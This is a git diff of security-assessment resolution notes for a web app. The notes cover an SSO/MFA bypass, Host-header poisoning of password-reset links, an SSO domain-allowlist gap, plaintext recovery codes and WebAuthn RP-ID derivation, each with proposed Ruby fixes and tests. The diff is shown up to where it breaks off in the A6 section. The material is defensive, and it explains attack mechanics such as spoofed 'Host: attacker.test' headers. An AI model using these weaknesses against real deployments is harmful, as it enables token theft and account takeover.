--- a/docs/security/assessment-2026-06-22/resolutions/A2-sso-mfa-bypass.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A2-sso-mfa-bypass.md
@@ -1,70 +1,84 @@
-# A2 — SSO bypasses MFA unconditionally
+# A2 — SSO and local MFA (opt-in second factor after SSO)
 
-- **Severity:** High (gated on SSO + MFA both enabled)
-- **Status:** Proposed fix
-- **Affects default config?** No (SSO off by default)
-- **Related:** A1, A4; #3499 (same SSO callback work). Finding 01.
+- **Severity:** Low–Medium — **revised after industry research** (was High). SSO-treated-as-fully-
+  authenticated is the *industry-default* posture, not a defect. Gated on SSO + MFA both enabled.
+- **Status:** Proposed fix — **additive/opt-in** (does NOT reverse the default)
+- **Affects default config?** No (SSO off by default; and the default SSO behaviour is unchanged)
+- **Related:** A1, A4; **#3114** (intentionally introduced the SSO-skips-MFA behaviour); #3499. Finding 01.
 - **Primary files:** `apps/web/auth/config/hooks/login.rb:128-133`,
   `apps/web/auth/operations/detect_mfa_requirement.rb:151-156`
 
-## Problem (recap)
+## Problem (recap) + research correction
 
-The MFA requirement is short-circuited whenever the login arrives via SSO:
+The original finding framed "SSO skips local MFA" (`via_omniauth: true` short-circuits the MFA
+requirement in `detect_mfa_requirement.rb:151-156`) as a High-severity bypass. **Industry research
+changes that assessment.** The dominant pattern across managed auth providers and frameworks is that
+**SSO is treated as fully authenticated by default, and local MFA is not layered on top** — the IdP is
+trusted to enforce its own MFA:
+
+- **WorkOS** *explicitly* exempts SSO users from MFA even when "Require MFA" is enabled, and disables
+  non-SSO methods for SSO orgs (the IdP handles MFA). [WorkOS AuthKit MFA docs]
+- **Clerk** treats SSO as fully authenticated; "Require MFA" is off by default, and for enterprise SSO
+  it defers to the IdP's MFA (Azure/Google/Okta). [Clerk enterprise-connections docs]
+- The same holds for the other surveyed frameworks: SSO = sufficient auth by default; any post-SSO MFA
+  is explicitly configured.
+
+So OTS's current behaviour (added deliberately in **#3114**) is **aligned with industry norms**, and an
+existing spec (`apps/web/auth/spec/unit/detect_mfa_requirement_spec.rb`) asserts it. Reversing it *by
+default* would (a) diverge from every comparable product, (b) reverse an intentional product decision,
+and (c) break that spec. We therefore do **not** make local-MFA-after-SSO the default.
+
+The residual, legitimate concern is narrow: a **high-assurance** operator may want defense-in-depth —
+require a local second factor after SSO regardless of the IdP. Today there is no way to opt into that.
+
+## Prescribed resolution (opt-in, default-off)
+
+Add an **optional** policy, defaulting to today's (industry-standard) behaviour:
+
+1. **Default (unchanged):** SSO is fully authenticated; an enrolled local second factor is NOT
+   challenged after SSO. Keeps #3114, keeps the existing spec green, matches WorkOS/Clerk.
+2. **New opt-in config `omniauth_require_local_mfa?` (default `false`).** When an operator enables it,
+   a successful SSO callback for an account with an active second factor (TOTP/WebAuthn) sets the
+   existing `awaiting_mfa` partial-auth state and routes through the normal MFA challenge.
+3. **Optional IdP step-up credit (refinement):** even with the opt-in on, treat the second factor as
+   satisfied when the OIDC token proves the IdP performed MFA — `amr` includes `mfa`/`otp`/`hwk`, or
+   `acr` matches a configured high-assurance value — behind explicit per-provider config
+   (`trust_idp_mfa` + allowed `acr`). Never infer MFA from the mere presence of SSO.
 
 ```ruby
-# detect_mfa_requirement.rb (≈151-156): via_omniauth: true returns "MFA not required"
-# before any per-account policy is consulted.
-```
-
-A user who has enrolled TOTP/WebAuthn can therefore authenticate with **only** the federated factor —
-SSO silently downgrades a 2-factor account to 1-factor. If A1 is also exploitable, MFA provides no
-backstop.
-
-## Root cause
-
-SSO is being treated as "authentication complete" rather than "first factor satisfied." The IdP's own
-assurance level (whether *it* performed MFA) is never inspected, and the local MFA enrollment is ignored
-for the `via_omniauth` path.
-
-## Prescribed resolution
-
-Treat federation as the **first factor**. After a successful SSO callback, consult the account's local
-MFA enrollment and the IdP's asserted authentication strength:
-
-1. **Default:** if the account has any active second factor (TOTP/WebAuthn/recovery), set the
-   `awaiting_mfa` partial-auth state after SSO and route through the existing MFA challenge — exactly as
-   password login does. Do **not** return early for `via_omniauth`.
-2. **IdP step-up credit (optional, explicit):** if the OIDC token asserts MFA was performed — `amr`
-   contains `mfa`/`otp`/`hwk`, or `acr` matches a configured high-assurance value — you *may* treat the
-   second factor as satisfied. Gate this behind explicit per-provider config
-   (`trust_idp_mfa: true` + allowed `acr` values); never infer it from the mere presence of SSO.
-3. Make the decision in `detect_mfa_requirement` so password and SSO share one code path: SSO changes
-   *which* first factor was used, not *whether* a second factor is required.
-
-```ruby
-# sketch
+# sketch — default returns today's behaviour unless the operator opts in
 def detect_mfa_requirement(account, via_omniauth:)
-  return mfa_satisfied if via_omniauth && idp_asserted_mfa?(omniauth_extra)   # opt-in only
-  require_mfa_if_enrolled(account)            # same logic for password and SSO
+  if via_omniauth
+    return mfa_not_required unless omniauth_require_local_mfa?      # default: industry-standard
+    return mfa_satisfied if idp_asserted_mfa?(omniauth_extra)       # optional step-up credit
+  end
+  require_mfa_if_enrolled(account)
 end
 ```
 
+Keep the decision in `detect_mfa_requirement` so password and SSO share one path; SSO only changes
+*which* first factor was used.
+
 ## Alternatives considered
 
-- **Keep skipping MFA for SSO** (status quo): rejected — defeats the user's explicit second-factor choice
-  and pairs catastrophically with A1.
-- **Always force local MFA even when IdP did step-up:** acceptable and safest default; the `amr`/`acr`
-  credit is an optional convenience, off by default.
+- **Reverse the default (require local MFA after SSO):** rejected — contrary to WorkOS/Clerk and the
+  surveyed frameworks, reverses intentional #3114 behaviour, and breaks the existing spec. Not
+  warranted given the IdP already authenticates (and usually MFAs) the user.
+- **Do nothing:** acceptable for most deployments, but leaves no lever for high-assurance operators who
+  explicitly distrust IdP-side MFA. The opt-in is cheap and self-contained.
 
 ## Test / verification
 
-- Account with TOTP enrolled logs in via SSO → lands in `awaiting_mfa`, second factor required.
-- With `trust_idp_mfa` on and token `amr=["mfa"]` → second factor satisfied; with `amr=["pwd"]` →
-  still challenged.
-- Account with no second factor → SSO logs in directly (unchanged).
+- **Default (opt-in off):** account with TOTP enrolled logs in via SSO → logged in, NOT challenged
+  (existing #3114 spec stays green).
+- **Opt-in on:** same account → lands in `awaiting_mfa`, second factor required.
+- **Opt-in on + `trust_idp_mfa` + token `amr=["mfa"]`:** second factor satisfied; `amr=["pwd"]` → still
+  challenged.
+- Account with no second factor → SSO logs in directly (unchanged) in all modes.
 
 ## Effort & risk
 
-- **Effort:** Small/Medium — localized to `detect_mfa_requirement` + the login hook. Reuses the existing
-  `awaiting_mfa` machinery (already correctly gated, per finding 01 positives).
-- **Risk:** Low. Land with A1/A4 as part of the SSO hardening PR before SSO ships.
+- **Effort:** Small — a config predicate consulted in `detect_mfa_requirement`, reusing the existing
+  `awaiting_mfa` machinery. No default behaviour change, so no migration.
+- **Risk:** Very low (default path untouched; the existing spec stays green). The opt-in is new,
+  isolated behaviour exercised only when explicitly enabled.

--- a/docs/security/assessment-2026-06-22/resolutions/A3-P2-host-header-trust.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A3-P2-host-header-trust.md
@@ -1,0 +1,71 @@
+# A3 / P2 — Host-header trust (poisoned auth-email links & host injection)
+
+- **Severity:** High (A3, auth email links) / Medium (P2, general host injection)
+- **Status:** Proposed fix — single shared remediation for two findings
+- **Affects default config?** A3 only when auth/email is enabled; P2 is latent in all configs
+- **Related:** A6 (WebAuthn RP-ID from host). Findings 01, 04 #3.
+- **Primary files:** `lib/middleware/detect_host.rb:156-194`, `lib/onetime/middleware/domain_strategy.rb:104-149`,
+  `apps/web/auth/config/email/reset_password.rb:14-15` (and sibling email link builders),
+  otto 2.3.1 trusted-proxy config (`Otto::Utils.resolve_client_ip` / trusted-proxy settings)
+
+## Problem (recap)
+
+- **A3:** Password-reset, magic-link, and verification **email links are built from
+  `request.base_url`**. OTS never pins Rodauth's `base_url`/`domain`, and the host middleware doesn't
+  reject untrusted Host values, so an attacker-supplied `Host`/`X-Forwarded-Host` causes a valid
+  single-use token to be embedded in a link pointing at an attacker domain — credential/token theft when
+  the victim clicks.
+- **P2:** `Rack::DetectHost` trusts forwarded host headers from **any** RFC1918/loopback peer using its
+  own `private_ip?`, independent of otto 2.3.1's trusted-proxy configuration. From an internal/SSRF
+  vantage this allows host-header injection that feeds routing, link generation, and reflected response
+  headers (`domain_strategy.rb:122-149`).
+
+These are the same underlying weakness: **the request-supplied host is trusted as authoritative.**
+
+## Root cause
+
+Host derivation is request-driven with ad-hoc trust (`private_ip?`), not pinned to a configured canonical
+host nor aligned with the framework's single trusted-proxy model.
+
+## Prescribed resolution
+
+Treat the public host as **configuration**, not request input, and align proxy trust with otto:
+
+1. **Pin a canonical host for all generated links.** Drive Rodauth `base_url`/`domain` and every email
+   link builder from `site.host` (+ `SSL`) configuration, not `request.base_url`. Password-reset, magic
+   link, and verification emails then always point at the canonical origin regardless of the inbound
+   `Host`. (`reset_password.rb` and siblings.)
+2. **Validate/allowlist the inbound Host.** In `DetectHost`/`DomainStrategy`, accept a forwarded host
+   only when it matches the configured canonical host or the configured custom-domain set; otherwise fall
+   back to the canonical host (don't reflect the attacker value). For custom-domain features, match
+   against the verified `CustomDomain` registry rather than trusting arbitrary input.
+3. **Align proxy trust with otto 2.3.1.** Replace `DetectHost`'s local `private_ip?` heuristic with the
+   single `site.network.trusted_proxy` configuration otto already uses for client-IP resolution
+   (`Otto::Utils.resolve_client_ip`). Forwarded `Host`/`X-Forwarded-Host` are honored **only** when the
+   immediate peer is a configured trusted proxy — same rule as forwarded client IPs. This is the
+   "harmonization" the recent otto 2.3.1 work started; extend it to host handling.
+4. **A6 follow-on:** with a pinned canonical origin, derive the WebAuthn RP-ID/origin from configuration
+   too (see `A6-webauthn-rpid.md`), eliminating host-derived RP-ID.
+
+## Alternatives considered
+
+- **Sanitize the Host but still reflect it:** insufficient — link generation needs an *authoritative*
+  origin; sanitization alone can't decide which host is legitimate.
+- **Trust the first reverse proxy implicitly:** that's the current bug (any private peer is "trusted").
+  Use the explicit trusted-proxy allowlist instead.
+
+## Test / verification
+
+- Password-reset/magic-link request with `Host: attacker.test` (and via `X-Forwarded-Host` from a
+  non-trusted peer) → the emitted email link uses the configured canonical host, not the attacker host.
+- `DetectHost` honors `X-Forwarded-Host` only from a configured trusted proxy; from an arbitrary
+  RFC1918 peer it does not.
+- Custom-domain request for a verified domain still resolves correctly; an unknown host falls back to
+  canonical.
+
+## Effort & risk
+
+- **Effort:** Medium — config-driven `base_url` for Rodauth/emails + host allowlisting + swapping
+  `private_ip?` for the otto trusted-proxy config.
+- **Risk:** Medium — custom-domain routing must keep working; cover canonical, verified-custom-domain,
+  and untrusted-host cases. Roll out behind the existing domains feature flag.

--- a/docs/security/assessment-2026-06-22/resolutions/A4-sso-domain-allowlist.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A4-sso-domain-allowlist.md
@@ -1,0 +1,53 @@
+# A4 — SSO domain allowlist enforced only on creation, not on linking
+
+- **Severity:** High (gated on SSO + a configured domain allowlist)
+- **Status:** Proposed fix
+- **Affects default config?** No
+- **Related:** A1 (same hook), #3499. Finding 01.
+- **Primary files:** `apps/web/auth/config/hooks/omniauth.rb:133-180` (creation guard),
+  fork `rodauth-omniauth/lib/rodauth/features/omniauth.rb:79-87`
+
+## Problem (recap)
+
+`allowed_signup_domains` / SSO domain policy is checked in `before_omniauth_create_account` (the
+account-**creation** path) but **not** on the account **lookup/linking** path. An SSO identity whose
+email domain is outside the allowlist can still resolve-and-link to an existing account, bypassing the
+domain restriction the operator configured.
+
+## Root cause
+
+Domain policy lives in the creation hook only. The linking path (`account_from_omniauth` →
+`_account_from_login`) never re-applies it, so the allowlist is not a complete authorization boundary.
+
+## Prescribed resolution
+
+Make the domain policy a single function applied at the **one** place that resolves the SSO email, so
+both creation and linking honor it:
+
+1. Centralize the check, e.g. `omniauth_email_domain_allowed?(email)`.
+2. Call it inside `resolve_omniauth_email` (the helper #3499 introduces) / `account_from_omniauth` so a
+   disallowed domain yields "no account" → blocked, **before** any linking decision.
+3. Keep the existing creation-time check (defense-in-depth) but it is no longer the sole gate.
+4. Default-deny semantics: when an allowlist is configured and the (verified, Tier-1) email's domain is
+   not in it, reject — do not fall through to Tier-2 claims or to linking.
+
+```ruby
+auth.account_from_omniauth do
+  email = resolve_omniauth_email                       # verified Tier-1 only (A1)
+  next nil unless email && omniauth_email_domain_allowed?(email)
+  # ... A1 secure-linking logic ...
+end
+```
+
+## Test / verification
+
+- Allowlist = `corp.com`; SSO login `user@evil.com` matching an existing account → **not linked**,
+  blocked.
+- Allowlist empty/unset → no domain restriction (unchanged).
+- Disallowed domain with only Tier-2 claims → blocked (no link, no create).
+
+## Effort & risk
+
+- **Effort:** Small — move/duplicate one check into the resolution helper.
+- **Risk:** Low; bundle with A1 (they edit the same hook). Note this also depends on A1 layer-1 so the
+  email used for the domain decision is the verified Tier-1 value, not a spoofable Tier-2 claim.

--- a/docs/security/assessment-2026-06-22/resolutions/A5-recovery-codes-plaintext.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A5-recovery-codes-plaintext.md
@@ -1,7 +1,7 @@
 # A5 — Recovery codes stored in plaintext in SQL
 
 - **Severity:** Medium (high impact: recovery codes are a full MFA-bypass credential)
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** No — gated on auth being enabled (Rodauth full-auth mode) **and** MFA
   (`otp`/`recovery_codes`) enrolled by the user. Recovery codes only exist once a user sets up TOTP/WebAuthn.
 - **Related:** A13 (64-bit recovery-code entropy — fix alongside), finding 01 §5/§13. MFA config in
@@ -11,6 +11,23 @@
   - fork `rodauth/lib/rodauth/features/recovery_codes.rb` (stores/compares verbatim — root cause)
   - fork `rodauth/lib/rodauth/features/base.rb` (`compute_hmac`, `timing_safe_eql?`, `random_key` helpers)
   - DB migration for `account_recovery_codes` (new, under the app's auth migrations dir)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §3f/§5).**
+> The prescribed fix below is **incomplete and kills recovery codes on the primary OTS flow** (double-HMAC).
+> It overrides `add_recovery_code` (store HMAC) and `recovery_code_match?` (compare HMAC) and stashes the
+> cleartext "for the add-recovery-codes response only" — but it never rewires the OTS `after_otp_setup`
+> auto-add path (`mfa.rb`), which reads codes back through the `auth_cached_method` `recovery_codes`
+> (fork `recovery_codes.rb:49`) and emits the now-HMAC'd values to the user. The user submits an HMAC, it is
+> HMAC'd again, no match is found → recovery codes are dead for every account that enrolled MFA via OTP setup
+> (the common path, since `auto_add_recovery_codes? true`).
+>
+> **Two corrections to the steps below:**
+> 1. Route **all** cleartext display through the request-scoped stash — including the `after_otp_setup`
+>    auto-add response, not only the manual add-recovery-codes response (step 2 currently scopes the stash
+>    too narrowly). Keep stored values HMAC'd.
+> 2. The migration (step 3) rewrites `code`, which is half the composite primary key `[:id, :code]`
+>    (`001_initial.rb:197`). An in-place `UPDATE ... SET code = HMAC(code)` mutates a PK component —
+>    **delete and re-insert each row** instead.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/A5-recovery-codes-plaintext.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A5-recovery-codes-plaintext.md
@@ -1,0 +1,194 @@
+# A5 — Recovery codes stored in plaintext in SQL
+
+- **Severity:** Medium (high impact: recovery codes are a full MFA-bypass credential)
+- **Status:** Proposed fix
+- **Affects default config?** No — gated on auth being enabled (Rodauth full-auth mode) **and** MFA
+  (`otp`/`recovery_codes`) enrolled by the user. Recovery codes only exist once a user sets up TOTP/WebAuthn.
+- **Related:** A13 (64-bit recovery-code entropy — fix alongside), finding 01 §5/§13. MFA config in
+  `apps/web/auth/config/features/mfa.rb`.
+- **Primary files:**
+  - `apps/web/auth/config/features/mfa.rb` (OTS override point — add storage/compare overrides here)
+  - fork `rodauth/lib/rodauth/features/recovery_codes.rb` (stores/compares verbatim — root cause)
+  - fork `rodauth/lib/rodauth/features/base.rb` (`compute_hmac`, `timing_safe_eql?`, `random_key` helpers)
+  - DB migration for `account_recovery_codes` (new, under the app's auth migrations dir)
+
+## Problem (recap)
+
+Recovery codes are written to and read from SQL **verbatim** — there is no hash or HMAC at rest, unlike
+password hashes (argon2) and OTP keys (which OTS HMAC-wraps via `otp_keys_use_hmac? true`,
+`mfa.rb:31`). Anyone with read access to the auth DB (compromise, backup leak, SQLi, broad console
+access) obtains working second-factor bypass codes for every MFA-enrolled account.
+
+Evidence (fork `recovery_codes.rb`):
+
+```ruby
+# Insert — stores new_recovery_code as-is (recovery_codes.rb:189-196)
+def add_recovery_code
+  retry_on_uniqueness_violation do
+    recovery_codes_ds.insert(recovery_codes_id_column=>session_value,
+                             recovery_codes_column=>new_recovery_code)   # cleartext
+  end
+end
+
+# Compare — pulls raw stored values and compares the raw param (recovery_codes.rb:162-173)
+def recovery_code_match?(code)
+  recovery_codes.each do |s|
+    if timing_safe_eql?(code, s)                                        # raw vs raw
+      recovery_codes_ds.where(recovery_codes_column=>code).delete
+      ...
+    end
+  end
+end
+
+# Read-back — select_map of the raw column (recovery_codes.rb:262-264)
+def _recovery_codes
+  recovery_codes_ds.select_map(recovery_codes_column)
+end
+```
+
+OTS only overrides the **generator** (`new_recovery_code { Familia.generate_trace_id }`, `mfa.rb:74-76`),
+not storage or comparison.
+
+## Root cause
+
+Neither this Rodauth fork **nor** upstream `rodauth 2.42.0` implements any hashing/HMAC of recovery
+codes — verified by grep over both `recovery_codes.rb` files (no `hmac`/`hash`/`compute_hmac`
+reference). So there is **no built-in `recovery_codes_hmac`-style toggle to flip**; the codes are
+inherently stored exactly as `new_recovery_code` returns them. The fix must override the
+store/read/compare methods in OTS config.
+
+> **Confirm first (was NEEDS-VALIDATION on the "rodauth supports hashing" assumption):** The original
+> finding suggested Rodauth "supports hashing recovery codes." It does **not** in the version on disk.
+> Before implementing, confirm no newer fork branch adds it; if it does, prefer the upstream toggle over
+> a local override. As of the reviewed tree, the override below is required.
+
+## Prescribed resolution
+
+Store a **keyed HMAC** (HMAC-SHA256 under the existing `AUTH_SECRET`-derived `hmac_secret`) of each
+recovery code; never persist the cleartext. Display the cleartext to the user exactly once at
+generation time (it is already shown only in the add/view response). Compare by HMAC-ing the submitted
+code and constant-time matching against stored HMACs.
+
+HMAC (keyed) is preferred over a plain hash here: recovery codes are short, so an unkeyed
+SHA-256 of a 64-bit code is offline-brute-forceable; the keyed HMAC ties recovery to `AUTH_SECRET`
+(defense-in-depth identical to the OTP-key and email-token treatment OTS already relies on). Use the
+Rodauth-provided `compute_hmac` (fork `base.rb:279`) so secret rotation semantics match the rest of the
+stack.
+
+### Implementation steps
+
+1. **Add override methods in `apps/web/auth/config/features/mfa.rb`.** Override storage and comparison so
+   the column always holds an HMAC. Because the feature reads codes back in several places
+   (`recovery_codes`, `_recovery_codes`, `recovery_code_match?`), override at the lowest seam —
+   `add_recovery_code` (store) and `recovery_code_match?` (compare):
+
+   ```ruby
+   # apps/web/auth/config/features/mfa.rb — inside MFA.configure(auth)
+
+   # Store only the HMAC of the code. The cleartext is surfaced to the user via
+   # the add-recovery-codes response; we never persist it.
+   auth.add_recovery_code do
+     retry_on_uniqueness_violation do
+       code = new_recovery_code                         # cleartext, shown to user
+       stash_plaintext_recovery_code(code)              # for the one-time view (see step 2)
+       db[recovery_codes_table].insert(
+         recovery_codes_id_column => session_value,
+         recovery_codes_column    => compute_hmac(code) # HMAC-SHA256 under AUTH_SECRET
+       )
+     end
+   end
+
+   # Compare by HMAC-ing the submitted code against stored HMACs (constant-time),
+   # then delete the matched row by its stored HMAC value.
+   auth.recovery_code_match? do |code|
+     hashed = compute_hmac(code)
+     stored = db[recovery_codes_table]
+                .where(recovery_codes_id_column => session_value)
+                .select_map(recovery_codes_column)
+     stored.each do |s|
+       next unless timing_safe_eql?(hashed, s)
+       db[recovery_codes_table]
+         .where(recovery_codes_id_column => session_value,
+                recovery_codes_column    => s).delete
+       add_recovery_code if recovery_codes_primary?      # preserve fork behavior
+       return true
+     end
+     false
+   end
+   ```
+
+   Note: `compute_hmac` is deterministic for a given `AUTH_SECRET`, so equality search and the
+   delete-by-value both work against the stored HMAC. `timing_safe_eql?` (fork `base.rb:726`) keeps the
+   compare constant-time, matching the original code's intent.
+
+2. **Preserve one-time display of the cleartext.** The add/view flow shows the codes to the user once.
+   Since the column now holds HMACs, the response builder can no longer read the cleartext back from the
+   DB. Capture the freshly generated cleartext codes in a request-scoped accumulator
+   (`stash_plaintext_recovery_code`) and have the view/JSON response read from it for the
+   add-recovery-codes response only. After the request, the cleartext is gone; the "View recovery codes"
+   route can no longer re-display old codes (this is a deliberate, correct hardening — see Alternatives).
+
+3. **DB migration — re-key existing rows.** Add a migration that HMACs any existing cleartext rows in
+   `account_recovery_codes` in place:
+   - Read each `(id, code)`; if the value does not already look like an HMAC (see step 4 marker),
+     `UPDATE ... SET code = HMAC(code)`.
+   - Run inside the app (Ruby migration calling `rodauth.compute_hmac`) rather than raw SQL, so the same
+     keyed HMAC is applied. Do this as an offline/maintenance migration, not a live request path.
+
+4. **Disambiguate already-migrated rows.** HMAC output is fixed-length hex/base64; cleartext trace IDs
+   are base36 ~13 chars. Detect "already HMAC" by length/charset, or add a one-time schema marker column
+   (`code_format`), defaulted to `:hmac` for new rows, so the migration is idempotent and re-runnable.
+
+5. **Operational controls (independent of code).** Enforce DB-at-rest encryption and tight access on
+   `account_recovery_codes` and its backups; ensure `AUTH_SECRET` is set and strong (cross-ref the
+   `hmac_secret_guard` boot assertion discussed in finding 01 §12 — if `AUTH_SECRET` is unset, `compute_hmac`
+   has no key and this mitigation degrades).
+
+### Alternatives considered
+
+- **Flip a built-in Rodauth toggle:** rejected — no such toggle exists in the fork or upstream 2.42
+  (verified). Would require upgrading/forking Rodauth itself; the local override is lower-risk and
+  self-contained.
+- **Unkeyed SHA-256 instead of HMAC:** rejected — recovery codes are short (64-bit, A13), so an unkeyed
+  digest is offline-brute-forceable from a DB dump. Keyed HMAC under `AUTH_SECRET` removes the offline
+  attack and mirrors the existing OTP-key/email-token treatment.
+- **Argon2/bcrypt per code:** rejected — recovery codes are server-side, rate-limited, single-use, and
+  account-bound; a memory-hard KDF per code adds cost without materially improving on a keyed HMAC for
+  this threat (DB read), and complicates the equality search.
+- **Keep cleartext but rely on DB encryption only:** rejected — at-rest DB encryption does not protect
+  against SQLi, console access, or logical backup leaks; app-layer HMAC is defense-in-depth on top.
+
+### Combine with A13
+
+Since this change rewrites `new_recovery_code`'s storage path, raise entropy at the same time: replace
+`Familia.generate_trace_id` (64-bit) with a 128-bit CSPRNG code (e.g. `random_key`-derived or
+`SecureRandom`), keeping a user-friendly base32/base36 rendering. One migration covers both A5 and A13.
+
+## Test / verification
+
+Add to `apps/web/auth/spec/` (integration + unit):
+
+1. **At-rest is HMAC, not cleartext:** enroll TOTP (auto-adds recovery codes via
+   `auto_add_recovery_codes? true`, `mfa.rb:50`); assert the `account_recovery_codes.code` column for the
+   account contains **no** value equal to any code shown in the add response, and that each stored value
+   equals `rodauth.compute_hmac(shown_code)`.
+2. **Auth still works:** submit a valid cleartext recovery code to the recovery-auth route → succeeds,
+   row is deleted, MFA satisfied; submit a used/garbage code → fails (no enumeration of remaining count).
+3. **Constant-time compare path** is exercised (no early-return on first byte) — assert via the
+   `timing_safe_eql?` call, not wall-clock timing.
+4. **Migration idempotency:** seed legacy cleartext rows; run migration once → values become HMACs and
+   still authenticate; run again → no double-HMAC (idempotent via the marker/charset check).
+5. **One-time display:** after generation, the "view recovery codes" route does not re-expose the
+   original cleartext (confirms step 2's intended behavior change).
+6. **Regression:** `auto_remove_recovery_codes?`/`recovery_codes_primary?` paths (`mfa.rb:56`,
+   fork `recovery_codes.rb:246-260`) still behave; primary-mode top-up after a match still works.
+
+## Effort & risk
+
+- **Effort:** Medium. Two method overrides + a one-time-display accumulator + an idempotent data
+  migration. No new dependency; reuses `compute_hmac`/`timing_safe_eql?`.
+- **Risk:** Medium. The behavior change (codes no longer re-displayable after creation) is a UX shift —
+  document it ("save these now; they cannot be shown again"). Migration must run before deploy or codes
+  briefly mismatch; gate behind a maintenance window or make `recovery_code_match?` accept either raw or
+  HMAC during a short transition, then drop the raw branch. Low regression risk for non-MFA users
+  (no recovery codes exist).

--- a/docs/security/assessment-2026-06-22/resolutions/A6-webauthn-rpid.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A6-webauthn-rpid.md
@@ -1,7 +1,7 @@
 # A6 — WebAuthn RP-ID and origin derived from attacker-controllable Host header
 
 - **Severity:** Medium (NEEDS-VALIDATION — net impact depends on edge `Host` enforcement)
-- **Status:** Proposed fix — follow-on to A3/P2; lands with the canonical-host work
+- **Status:** Proposed fix — **corrected 2026-06-24 (snippet defect fixed in place; see callout)** — follow-on to A3/P2; lands with the canonical-host work
 - **Affects default config?** No — gated on auth being enabled **and** WebAuthn enrolled
   (`:webauthn`/`:webauthn_login`). WebAuthn is conditionally enabled (`webauthn.rb:9-11`).
 - **Related:** **A3/P2 host-header-trust** (shared root cause and shared canonical-host fix — see
@@ -11,6 +11,19 @@
   - `apps/web/auth/config/features/webauthn.rb:14-22` (RP-ID/origin derivation — the fix point)
   - `lib/onetime/middleware/domain_strategy.rb:137,191-193,398-402` (validated host + canonical host)
   - fork `rodauth/lib/rodauth/features/webauthn.rb` (consumes `webauthn_rp_id`/`webauthn_origin`)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5 (compile-level defects)).**
+> Verdict: **scope-incomplete** — the resolution direction is sound (`sound_with_caveats`, severity unchanged
+> **Medium**, §9 matrix), but the step-2 origin snippet **does not compile or run as written**. Two defects:
+> 1. It reads a bare `env['onetime.display_domain']` (line 92), but `env` is not in scope inside a Rodauth
+>    config block → **NameError**. The in-scope accessor is `request.env` (Rodauth exposes `request`; cf. the
+>    existing `request.host` usage at `webauthn.rb:14-22`).
+> 2. It calls `allowed_webauthn_host?(host)` (line 93), which **does not exist** — `rg "allowed_webauthn_host"
+>    lib apps` returns no definition. Either define the helper (step 3 only describes it) or inline the host check.
+>
+> **Correction:** source the host via `request.env['onetime.display_domain']` and inline the allowlist test
+> until the step-3 helper is actually authored, so the block compiles and runs. The snippet below is corrected
+> in place.
 
 ## Problem (recap)
 
@@ -89,8 +102,11 @@ domains) explicitly rather than by trusting the request.
      scheme    = Onetime.conf.dig('site', 'ssl') ? 'https' : 'http'
      # Prefer the validated display domain when it is an allowed first-party host;
      # otherwise pin to the canonical origin.
-     host = env['onetime.display_domain']
-     host = canonical unless allowed_webauthn_host?(host)   # see step 3
+     # corrected 2026-06-24: `env` is not in scope in a Rodauth config block — read via
+     # `request.env`; and `allowed_webauthn_host?` has no definition (see step 3), so the
+     # allowlist test is inlined here until that helper is authored.
+     host = request.env['onetime.display_domain']
+     host = canonical unless host && host == canonical   # inline allowlist; broaden in step 3
      "#{scheme}://#{host}"
    end
    ```

--- a/docs/security/assessment-2026-06-22/resolutions/A6-webauthn-rpid.md
+++ b/docs/security/assessment-2026-06-22/resolutions/A6-webauthn-rpid.md
@@ -1,0 +1,164 @@
+# A6 — WebAuthn RP-ID and origin derived from attacker-controllable Host header
+
+- **Severity:** Medium (NEEDS-VALIDATION — net impact depends on edge `Host` enforcement)
+- **Status:** Proposed fix — follow-on to A3/P2; lands with the canonical-host work
+- **Affects default config?** No — gated on auth being enabled **and** WebAuthn enrolled
+  (`:webauthn`/`:webauthn_login`). WebAuthn is conditionally enabled (`webauthn.rb:9-11`).
+- **Related:** **A3/P2 host-header-trust** (shared root cause and shared canonical-host fix — see
+  `A3-P2-host-header-trust.md` §3 step 4), finding 01 §6. Reuses `env['onetime.display_domain']` /
+  `DomainStrategy.canonical_domain`.
+- **Primary files:**
+  - `apps/web/auth/config/features/webauthn.rb:14-22` (RP-ID/origin derivation — the fix point)
+  - `lib/onetime/middleware/domain_strategy.rb:137,191-193,398-402` (validated host + canonical host)
+  - fork `rodauth/lib/rodauth/features/webauthn.rb` (consumes `webauthn_rp_id`/`webauthn_origin`)
+
+## Problem (recap)
+
+Both the expected RP-ID and the expected origin are taken straight from the inbound request host:
+
+```ruby
+# apps/web/auth/config/features/webauthn.rb:14-22
+auth.webauthn_rp_id  do
+  request.host                                   # attacker-controllable Host
+end
+auth.webauthn_origin do
+  "#{request.scheme}://#{request.host_with_port}" # tracks the same host
+end
+```
+
+Because the **expected** RP-ID and origin both move to match whatever host the request claims, a
+mismatched/attacker host does not fail verification — the anti-phishing origin check degenerates to
+"origin must equal whatever host this request says it is." If any unvalidated host reaches the app
+(precisely the A3/P2 gap — the edge and `DomainStrategy` do not reject untrusted hosts; see
+`A3-P2-host-header-trust.md`), a credential registered under host A can be exercised in a ceremony run
+under an attacker-chosen RP-ID/origin. (Assertion *replay* is still blocked by `sign_count`; the weakened
+control is origin pinning.)
+
+The codebase already computes a validated host (`env['onetime.display_domain']`,
+`domain_strategy.rb:137`) and a configured canonical host (`DomainStrategy.canonical_domain`,
+`domain_strategy.rb:191-193`, sourced from `domains.default || site.host`, `:398-402`) — WebAuthn simply
+does not use either.
+
+> **Confirm first (NEEDS-VALIDATION):** Standalone exploitability requires that an unvalidated `Host`
+> can actually reach the Rack app in production (i.e. the edge proxy does not strictly pin `Host`). This
+> is the same precondition as A3/P2. Confirm the production edge behavior before rating impact; the fix
+> below is correct hardening regardless and is essentially free once A3/P2's canonical-host pinning
+> lands.
+
+## Root cause
+
+RP-ID/origin are treated as **request-derived** rather than **configuration-derived**. WebAuthn's
+security model assumes the RP (relying party) defines a fixed, trusted RP-ID and origin allowlist;
+deriving them from `request.host` hands that definition to the client/network.
+
+## Prescribed resolution
+
